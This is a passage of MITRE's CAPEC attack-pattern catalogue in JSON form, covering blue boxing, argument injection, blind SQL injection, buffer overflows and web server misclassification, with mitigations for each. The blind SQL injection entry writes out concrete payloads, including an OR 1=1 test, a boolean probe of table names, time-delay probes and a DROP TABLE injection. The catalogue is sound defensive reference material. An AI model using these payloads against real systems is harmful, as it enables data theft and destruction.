MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"5":{"ID":"5","Name":"Blue Boxing","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"220"}},"Prerequisites":{"Prerequisite":"System must use weak authentication mechanisms for administrative functions."},"Skills_Required":{"Skill":["Given a vulnerable phone system, the attackers\' technical vector relies on attacks that are well documented in cracker \'zines and have been around for decades.",{"Level":"Low"}]},"Resources_Required":{"Resource":"CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch"},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Implementation: Upgrade phone lines. Note this may be prohibitively expensive","Use strong access control such as two factor access control for administrative access to the switch"]},"Example_Instances":{"Example":"An adversary identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the adversary has gained control of the switch launching calls, routing calls, and a whole host of opportunities are available."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"285"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"6":{"ID":"6","Name":"Argument Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Discovery of potential injection vectors] Using an automated tool or manual discovery, the attacker identifies services or methods with arguments that could potentially be used as injection vectors (OS, API, SQL procedures, etc.).","Technique":["Manually cover the application and record the possible places where arguments could be passed into external systems.","Use a spider, for web applications, to create a list of URLs and associated inputs."]},{"Step":"2","Phase":"Experiment","Description":"[1. Attempt variations on argument content] Possibly using an automated tool, the attacker will perform injection variations of the arguments.","Technique":["Use a very large list of probe strings in order to detect if there is a positive result, and, what type of system has been targeted (if obscure).","Use a proxy tool to record results, error messages and/or log if accessible."]},{"Step":"3","Phase":"Exploit","Description":"[Abuse of the application] The attacker injects specific syntax into a particular argument in order to generate a specific malicious effect in the targeted application.","Technique":"Manually inject specific payload into targeted argument."}]},"Prerequisites":{"Prerequisite":["Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions.","Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client."]},"Skills_Required":{"Skill":["The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.","Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.","Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise."]},"Example_Instances":{"Example":"A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [REF-482]"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"146"},{"CWE_ID":"184"},{"CWE_ID":"78"},{"CWE_ID":"185"},{"CWE_ID":"697"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-482"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"7":{"ID":"7","Name":"Blind SQL Injection","Abstraction":"Detailed","Status":"Draft","Description":"Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"66"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":["[Hypothesize SQL queries in application]",{"p":["Generated hypotheses regarding the SQL queries in an application. For example, the adversary may hypothesize that their input is passed directly into a query that looks like:","Of course, there are many other possibilities."],"div":["\\"SELECT * FROM orders WHERE ordernum = _____\\"",{"style":"margin-left:10px;","class":"informative"}]}],"Technique":"Research types of SQL queries and determine which ones could be used at various places in an application."},{"Step":"2","Phase":"Explore","Description":["[Determine how to inject information into the queries]",{"p":"Determine how to inject information into the queries from the previous step such that the injection does not impact their logic. For example, the following are possible injections for those queries:","div":["\\"5\' OR 1=1; --\\"",{"style":"margin-left:10px;","class":"informative"}]}],"Technique":["Add clauses to the SQL queries such that the query logic does not change.","Add delays to the SQL queries in case server does not provide clear error messages (e.g. WAITFOR DELAY \'0:0:10\' in SQL Server or BENCHMARK(1000000000,MD5(1) in MySQL). If these can be injected into the queries, then the length of time that the server takes to respond reveals whether the query is injectable or not."]},{"Step":"3","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to injection] Determine the user-controllable input susceptible to injection. For each user-controllable input that the adversary suspects is vulnerable to SQL injection, attempt to inject the values determined in the previous step. If an error does not occur, then the adversary knows that the SQL injection was successful.","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.","Use network-level packet injection tools such as netcat to inject input","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"4","Phase":"Experiment","Description":"[Determine database type] Determines the type of the database, such as MS SQL Server or Oracle or MySQL, using logical conditions as part of the injected queries","Technique":["Try injecting a string containing char(0x31)=char(0x31) (this evaluates to 1=1 in SQL Server only)","Try injecting a string containing 0x313D31 (this evaluates to 1=1 in MySQL only)","Inject other database-specific commands into input fields susceptible to SQL Injection. The adversary can determine the type of database that is running by checking whether the query executed successfully or not (i.e. whether the adversary received a normal response from the server or not)."]},{"Step":"5","Phase":"Exploit","Description":"[Extract information about database schema] Extract information about database schema by getting the database to answer yes/no questions about the schema.","Technique":["Automatically extract database schema using a tool such as Absinthe.","Manually perform the blind SQL Injection to extract desired information about the database schema."]},{"Step":"6","Phase":"Exploit","Description":"[Exploit SQL Injection vulnerability] Use the information obtained in the previous steps to successfully inject the database in order to bypass checks or modify, add, retrieve or delete data from the database","Technique":"Use information about how to inject commands into SQL queries as well as information about the database schema to execute attacks such as dropping tables, inserting records, etc."}]},"Prerequisites":{"Prerequisite":["SQL queries used by the application to store, retrieve or modify data.","User-controllable input that is not properly validated by the application as part of SQL queries."]},"Skills_Required":{"Skill":["Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":"The only indicators of successful Blind SQL Injection are the application or database logs that show similar queries with slightly differing logical conditions that increase in complexity over time. However, this requires extensive logging as well as knowledge of the queries that can be used to perform such injection and return meaningful information from the database."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.","Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(\') or SQL-comments (--) based on the context in which they appear."]},"Example_Instances":{"Example":[{"p":["An adversary may try entering something like \\"username\' AND 1=1; --\\" in an input field. If the result is the same as when the adversary entered \\"username\\" in the field, then the adversary knows that the application is vulnerable to SQL Injection. The adversary can then ask yes/no questions from the database server to extract information from it. For example, the adversary can extract table names from a database using the following types of queries:","If the above query executes properly, then the adversary knows that the first character in a table name in the database is a letter between m and z. If it doesn\'t, then the adversary knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the adversary can determine all table names in the database. Subsequently, the adversary may execute an actual attack and send something like:"],"div":["\\"username\' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) > 108\\".",{"style":"margin-left:10px;","class":"informative"},"\\"username\'; DROP TABLE trades; --",{"style":"margin-left:10px;","class":"informative"}]},"In the PHP application TimeSheet 1.1, an adversary can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the adversary is aware of the local path structure, the adversary can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST[\'username\'] variable in the login.php file. See also: CVE-2006-4705"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"89"},{"CWE_ID":"209"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Blind SQL Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"8":{"ID":"8","Name":"Buffer Overflow in an API Call","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An adversary who has knowledge of known vulnerable libraries or shared code can easily target software that makes use of these libraries. All clients that make use of the code library thus become vulnerable by association. This has a very broad effect on security across a system, usually affecting more than one software process.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary, with knowledge of vulnerable libraries or shared code modules, identifies a target application or program that makes use of these."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary attempts to use the API, and if they can they send a large amount of data to see if the buffer overflow attack really does work.","Technique":"Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected based on their knowledge of the vulnerability and their desired outcome. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries\' choosing which points to code injected by the adversary.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the API as the injection vector, the adversary injects the crafted overflow content into the buffer."}]},"Prerequisites":{"Prerequisite":["The target host exposes an API to the user.","One or more API functions exposed by the target host has a buffer overflow vulnerability."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use a language or compiler that performs automatic bounds checking.","Use secure functions not vulnerable to buffer overflow.","If you have to use dangerous functions, make sure that you do boundary checking.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Use OS-level preventative functionality. Not a complete solution."]},"Example_Instances":{"Example":[{"div":["Attack Example: Libc in FreeBSD",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in the FreeBSD utility setlocale (found in the libc module) puts many programs at risk all at once."},{"div":["Xtlib",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"118"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"9":{"ID":"9","Name":"Buffer Overflow in Local Command-Line Utilities","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets command-line utilities available in a number of shells. An attacker can leverage a vulnerability found in a command-line utility to escalate privilege to root.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target system] The adversary first finds a target system that they want to gain elevated priveleges on. This could be a system they already have some level of access to or a system that they will gain unauthorized access at a lower privelege using some other means."},{"Step":"2","Phase":"Explore","Description":"[Find injection vector] The adversary identifies command line utilities exposed by the target host that contain buffer overflow vulnerabilites. The adversary likely knows which utilities have these vulnerabilities and what the effected versions are, so they will also obtain version numbers for these utilities."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow command] Once the adversary has found a vulnerable utility, they will use their knownledge of the vulnerabilty to create the command that will exploit the buffer overflow."},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary executes the crafted command, gaining elevated priveleges on the machine."}]},"Prerequisites":{"Prerequisite":["The target host exposes a command-line utility to the user.","The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Carefully review the service\'s implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow.","Use a language or compiler that performs automatic bounds checking.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Operational: Use OS-level preventative functionality. Not a complete solution.","Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.","Do not unnecessarily expose services."]},"Example_Instances":{"Example":{"div":[{"style":"margin-left:10px;","div":["Attack Example: HPUX passwd",{"style":"color:#32498D; font-weight:bold;"},"A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option."]},{"style":"margin-left:10px;","div":["Attack Example: Solaris getopt",{"style":"color:#32498D; font-weight:bold;"},"A buffer overflow in Solaris\'s getopt command (found in libc) allows local users to gain root privileges via a long argv[0]."]}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"10":{"ID":"10","Name":"Buffer Overflow via Environment Variables","Abstraction":"Detailed","Status":"Draft","Description":"This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.","Extended_Description":"Although the focus of this attack is putting excessive content into an environment variable that is loaded into a buffer, environment variables can be used to assist a classic buffer overflow attack as well. In the case where the buffer used in a traditional buffer overflow attack is not large enough to store the adversary\'s shell code, they will store the shell code in an environment variable and attempt to return to its address, rather than back into the data they wrote to the buffer.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. In this attack the adversary looks for an application that loads the content of an environment variable into a buffer."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"Change the values of environment variables thought to be used by the application to contain excessive data. If the program is loading the value of the environment variable into a buffer, this could cause a crash and an attack vector will be found."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary injects the crafted overflow content into the buffer."}]},"Prerequisites":{"Prerequisite":["The application uses environment variables.","An environment variable exposed to the user is vulnerable to a buffer overflow.","The vulnerable environment variable uses untrusted data.","Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":"If the application does bound checking, it should fail when the data source is larger than the size of the destination buffer. If the application\'s code is well written, that failure should trigger an alert."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Do not expose environment variable to the user.","Do not use untrusted data in your environment variables.","Use a language or compiler that performs automatic bounds checking","There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow."]},"Example_Instances":{"Example":[{"div":["Attack Example: Buffer Overflow in $HOME",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable."},{"div":["Attack Example: Buffer Overflow in TERM",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in the rlogin program involves its consumption of the TERM environmental variable."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"302"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"99"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Buffer Overflow via Environment Variables"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-2"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow, Extended_Description"}]}},"11":{"ID":"11","Name":"Cause Web Server Misclassification","Abstraction":"Detailed","Status":"Draft","Description":"An attack of this type exploits a Web server\'s decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process. This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker\'s job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"635"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Footprint file input vectors] Manually or using an automated tool, an attacker searches for all input locations where a user has control over the filenames or MIME types of files submitted to the web server.","Technique":["Attacker manually crawls application to identify file inputs","Attacker uses an automated tool to crawl application identify file inputs","Attacker manually assesses strength of access control protecting native application files from user control","Attacker explores potential for submitting files directly to the web server via independently constructed HTTP Requests"]},{"Step":"2","Phase":"Experiment","Description":"[File misclassification shotgunning] An attacker makes changes to file extensions and MIME types typically processed by web servers and looks for abnormal behavior.","Technique":["Attacker submits files with switched extensions (e.g. .php on a .jsp file) to web server.","Attacker adds extra characters (e.g. adding an extra . after the file extension) to filenames of files submitted to web server."]},{"Step":"3","Phase":"Experiment","Description":"[File misclassification sniping] Understanding how certain file types are processed by web servers, an attacker crafts varying file payloads and modifies their file extension or MIME type to be that of the targeted type to see if the web server is vulnerable to misclassification of that type.","Technique":["Craft a malicious file payload, modify file extension to the targeted file type and submit it to the web server.","Craft a malicious file payload, modify its associated MIME type to the targeted file type and submit it to the web server."]},{"Step":"4","Phase":"Exploit","Description":"[Disclose information] The attacker, by manipulating a file extension or MIME type is able to make the web server return raw information (not executed).","Technique":["Manipulate the file names that are explicitly sent to the server.","Manipulate the MIME sent in order to confuse the web server."]}]},"Prerequisites":{"Prerequisite":["Web server software must rely on file name or file extension for processing.","The attacker must be able to make HTTP requests to the web server."]},"Skills_Required":{"Skill":["To modify file name or file extension",{"Level":"Low"},"To use misclassification to force the Web server to disclose configuration information, source, or binary data",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":"Implementation: Server routines should be determined by content not determined by filename or file extension."},"Example_Instances":{"Example":{"p":["J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers\' web browser.","Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.","[REF-6]"],"div":["http://victim.site/login.jsp.",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"430"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-6"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE 